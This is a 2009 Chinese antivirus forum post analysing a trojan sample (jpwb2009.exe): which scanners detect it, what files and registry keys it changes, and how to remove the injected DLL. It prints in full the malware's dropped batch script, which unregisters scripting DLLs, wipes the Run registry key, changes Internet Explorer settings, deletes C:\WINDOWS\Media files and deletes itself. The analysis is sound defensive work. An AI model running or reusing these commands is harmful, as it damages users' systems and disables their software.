baohe - 2009-8-23 15:55:00
引用:
原帖由 天月来了 于 2009-8-23 15:08:00 发表
http://bbs.ikaka.com/showtopic-8657394-2.aspx
文件名:[url=http://bbs.ikaka.com/attachment.aspx?attachmentid=557957]染毒文件.r......
http://bbs.ikaka.com/showtopic-8657394-2.aspx
文件名:[url=http://bbs.ikaka.com/attachment.aspx?attachmentid=557957]染毒文件.r......
母体jpwb2009.exeRAV2010最新库不认识(但RIS2010可有效拦截其网络访问动作)。
jpwb2009.exe运行后释放的那个随机文件名.exe(也就是你附件中的第二个DD)RAV2010可灭掉。
此毒无感染动作。
作者比较菜。此毒作案时(那个.bat运行)居然不隐藏DOS命令窗口:kaka6:
下面两图是其文件创建及注册表改动情况:
附件: 您所在的用户组无法下载或查看附件 附件: 您所在的用户组无法下载或查看附件C盘根目录下的那个.bat内容如下:
sntofhpsilcazdmsntofhpsilcazdm
regsvr32.exe /u /s msvidctl.dll
chhhgrauwtxwvycynfrqygvk
regsvr32.exe /u /s scrrun.dll
nkmzgklnsbmsmcgwihpsktuvfk
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
perkhcwpfhxxseopxuhr
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
agfcivgitrwkdgycbfudem
regsvr32.exe /u /s itss.dll
kakvinrkhaopjpcipzeywzqf
regsvr32.exe /u /s vbscript.dll
ncpfbfcevinybovwwv
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d no /F
xwvycynfrqygvkkiuytnbiiacdbrc
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable Script Debugger" /t REG_SZ /d yes /F
hzirdqxzfprviqegnseyjpy
ktnjdjiatgiquiwsvddstjvhm
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DisableScriptDebuggerIE /t REG_SZ /d yes /F
uvtuebturrxusuifvor
regsvr32.exe /s jscript.dll
fpymfulwvwsvazeplfkes
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
pjlfgewpreknxfakaomlkyg
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
rlqpgxhrfftbyjcpd
del C:\WINDOWS\Media\*.* /Q
cgwihpsktuvfkckuigtnqrgcgvxt
del C:\WINDOWS\Media\*.* /Q
mibbahcmhtvklssvtlzejm
del %0
del %0
pcolbanfvtfmcxujjxiuqvkg
exit
插进程的是这个随机名dll(在WINDOWS目录下,还有一个同名的txt,二者均可用IceSword强制删除。)
附件: 您所在的用户组无法下载或查看附件